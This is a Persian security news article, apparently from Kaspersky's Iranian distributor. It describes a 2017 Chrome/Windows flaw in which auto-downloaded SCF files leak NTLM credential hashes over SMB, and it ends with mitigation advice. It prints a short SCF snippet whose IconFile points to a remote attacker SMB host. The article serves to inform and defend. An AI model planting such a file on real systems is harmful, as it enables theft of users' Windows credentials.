۱۳۹۶/۳/۲۸ امنیت اطلاعات

روابط عمومی شرکت ایدکو (توزیع کننده محصولات کسپرسکی در ایران)یک محقق امنیتی به تازگی متوجه آسیب پذیری در گوگل کروم شده است. آسیب‌پذیری در تنظیمات پیش‌فرض آخرین ورژن از بروزرگوگل کروم یافت شده است که بر روی تمامی ورژن ‌های سیستم‌عامل ویندوز شامل ویندوز ۱۰ قابل اجرا می باشد. این آسیب پذیری به مهاجم اجازه ی دسترسی از راه دور به کلمه ی عبور و نام کاربر کاربر را می دهد که می تواند هر دوی آن ها را به سرقت ببرد.

این محقق که Bosko Stankovic نام دارد شیوه ی عملکرد این آسیب پذیری را اینگونه به تصویر شده است: مشاهده یک وب‌سایت شامل یک فایل SFC مخرب، می‌تواند به قربانی این اجازه را دهد تا بدون داشتن هیچ اطلاعی، اطلاعات ضروری مرتبط با ورود به کامپیوتر شخصی خود را با مهاجمان از طریق گوگل کروم و پروتکل SMB به اشتراک بگذارند.

قابل توجه است که این روش حمله جدید نیست و توسط یک بدافزار قدیمی به نام Stuxnet (یک بدافزار قوی که به‌طور خاص طراحی شده بود تا فرآیند صلح‌آمیز هسته‌ای کشور ایران را نابود کند.) مورد استفاده قرار گرفته بود. Stuxnet از فایل‌های LNK که نوعی میانبر در ویندوز هستند استفاده می‌کرد و سیستم‌ها را در معرض خطر قرار می‌داد.

اما این حمله با دیگر حملات کمی تفاوت است و فرق آن در این است که در این حمله احراز هویت SMB برای اولین بار در گوگل کروم مورد استفاده قرار گرفت.

کروم + SCF + SMB = سرقت اطلاعات ورود به ویندوز کاربر

فرمت فایل میانبر SCF یا همان پوسته ی فرمان فایل، تقریبا مشابه فایل های LNK که در بالا به آن اشاره کردیم عمل می کند و به گونه ای طراحی شده است که مجموعه‌ای محدود از دستورات ویندوز اکسپلورر را پشتیبانی کند و به تعریف آیکونی در صفحه ی دسکتاپ شما کمک می کند.

Stankovic در وبلاگی این آسیب پذیری را اینگونه توضیح می دهد: “در حال حاضر، یک مجرم تنها نیاز دارد که قربانی (که دارای گوگل کروم و ویندوز کاملاً به‌روز شده است) را فریب دهد تا از وب‌سایت مربوط به مجرم بازدید کند و و از این طریق بتواند اطلاعات حساس وی را به سرقت ببرد.

در واقعا لینک های میانبر بر روی دستکتاپ شما فایل های متنی با یک ترکیب خاص از کد پوسته هستند که محل قرارگیری آیکون، نام برنامه و محل برنامه در آن مشخص شده است.

[Shell]
Command=2
IconFile=explorer.exe,3

از آنجایی که گوگ کروم به فایل های SCF ویندوز اعتماد دارد، مجرمان به راحتی از این فرصت استفاده می کنند و می توانند قربانیان را به بازدید از وب سایت های خود که شامل یک فایل میابنر دستکاری شده مخرب است فریب دهند. تنها کافی است از سایت مجرمان بازدید شود، آن جا است که فایل به‌صورت خودکار بر روی سیستم مورد هدف و بدون گرفتن تأییدیه از کاربر دانلود می‌شود.

به‌محض اینکه کاربر فولدری را که حاوی فایل دانلود شده است باز می‌کند بلافاصله و یا بعداً این فایل به‌صورت خودکار اجرا می‌شود تا یک آیکون را بدون اینکه کاربر بر روی آن کلیک کند، بازیابی کند.

اما به‌جای آنکه محل تصویر یک آیکون تنظیم شود، فایل SCF مخرب توسط مجرم و شامل محل سرور SMB از راه دور ساخته می‌شود.

[Shell]
IconFile=\\170.170.170.170\icon

بنابراین هنگامی که فایل SCF تلاش می کند تا تصویر آیکون را بازیابی کند، فریب میخورد و باعث می شود یک احراز هویت خودکار را که توسط سرور از راه دور مهاجم بر روی پروتکل SMB کنترل می‌شود و از طریق آن نام کاربری و کلمه عبور درهم کاربر را تحویل می‌دهد، بسازد. این دسترسی از راه دور به مهاجم اجازه می‌دهد تا از این اطلاعات استفاده کند و به کامپیوتر شخصی شما و یا شبکه شما وارد شود.

Stankovic همچنین می‌گوید: “قرار دادن محل یک آیکون در یک سرور SMB از راه دور یک شاخص حمله شناخته شده است که از ویژگی احراز هویت خودکار ویندوز سوء استفاده می‌کند در هنگامی ‌که به سرویس‌هایی مانند اشتراک ‌گذاری فایل از راه دور دسترسی داشته باشد.”

با این حال، مایکروسافت پس از حملات Stuxnet فایل های LNK را مجبور کرد تا آیکون‌های خود را فقط از منابع داخلی بارگذاری کنند بنابراین آن‌ها دیگر نسبت به چنین حملاتی آسیب‌پذیر نبودند که آن‌ها را مجبور به بارگذاری یک کد مخرب از سرور‌های بیرونی می‌کرد.

اما متاسفانه فایل‌های SCF رهاشده باقی ماندند.

اکسپلویت از احراز هویت هشِ LM/NTLM از طریق فایل SCF

چنین آسیب‌پذیری‌هایی، بر طبق گفته Stankovic ، می‌تواند باعث به وجود آمدن تهدیدات جدی نسبت به سازمان‌های بزرگ شود. این آسیب ‌پذیری‌ها مهاجمان را قادر می‌سازد تا یکی از اعضای آن‌ها را جعل هویت کرده و به مهاجم اجازه می‌دهد تا بلافاصله از امتیازات به دست آورده دوباره استفاده کند تا سطح دسترسی را افزایش داده و بر روی منابع IT سازمان موردنظر دسترسی و کنترل داشته باشد و نسبت به دیگر اعضا نیز حملاتی را انجام دهد.

نحوه مقابله با حملات مرتبط با احراز هویت SMB

  1. اگر حضور ذهن داشته باشید برای مشکل امنیتی که در ویندوز ها هم پیش آمده بود توصیه کردیم که ارتباطات خروجی SMB را ببندید. در این مورد هم (پورت‌های TCP شامل ۱۳۹ و ۴۴۵) را از شبکه داخلی به یک WAN از طریق فایروال مسدود کنید، بنابراین کامپیوترهای داخلی نمی‌توانند با سرور‌های SMB راه دور ارتباط داشته باشند.
  2. تنظیمات زیر را در گوگل کروم انجام دهید، این تغییرات به شما اجازه می‌دهد تا به‌صورت دستی هر تلاش برای دانلودی را از طریق گوگل کروم تأیید کنید، که البته به ‌طور قابل ‌توجهی خطر این‌گونه حملات را کاهش می‌دهد.
    به بخش Settings گوگل کروم خود بروید. گزینه ی Show advanced settings را در قسمت پایین صفحه بیابید و سپس تیک Ask where to save each file before downloading را بزنید.
  3. گوگل از این آسیب‌پذیری آگاه است و گفته است که در حال کاربر روی ارائه وصله مناسب برای آن است، اما زمانی برای ارائه آن تعیین نکرده است.
  4. از یک راهکار امنیتی قوی و قابل اعتماد استفاده کنید.

     منبع: کسپرسکی آنلاین(ایدکو)

    *  کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکی، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکي نام دارد.